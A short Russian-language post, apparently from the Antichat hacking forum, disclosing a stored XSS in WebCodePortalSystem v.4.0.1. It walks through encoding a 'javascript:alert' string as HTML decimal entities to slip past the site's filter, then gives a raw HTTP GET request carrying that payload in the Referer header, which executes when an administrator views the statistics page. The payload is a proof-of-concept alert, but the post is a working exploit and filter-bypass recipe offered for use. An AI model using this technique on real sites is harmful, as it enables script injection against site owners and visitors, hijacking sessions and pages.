Форум АНТИЧАТ - Показать сообщение отдельно

WebCodePortalSystem v.4.0.1

[Активная XSS]

Достаточно быстро залатали предыдущие уязвимости, но латали на скорую руку, судя по всему, и активная XSS попрежнему осталась, хотя с ней будет немного больше гемора чем было раньше, но это уже мелочи.

Для обхода филтра воспользуемся вот этим удобным скриптом с помощью которого можно обойти многие фильтры:

http://ha.ckers.org/xss.html#XSScalc

Закодируем нашу строку:

javascript:alert('test'); -> Character Encoding Calculator -> вводим сюда скрипт: ASCII Text -> и получаем его здесь Decimal Value: HTML (without semicolons): -> &#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#116&#101&#115&#116&#39&#41&#59

Формируем пакет:

Код:

GET /index.php HTTP/1.1
Host: test2.ru
Referer: http://<IMG SRC=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#116&#101&#115&#116&#39&#41&#59>
Connection: close

Отправляем его и видим результат работы скрипта на страничке со статистикой:

Статистика -> Переходы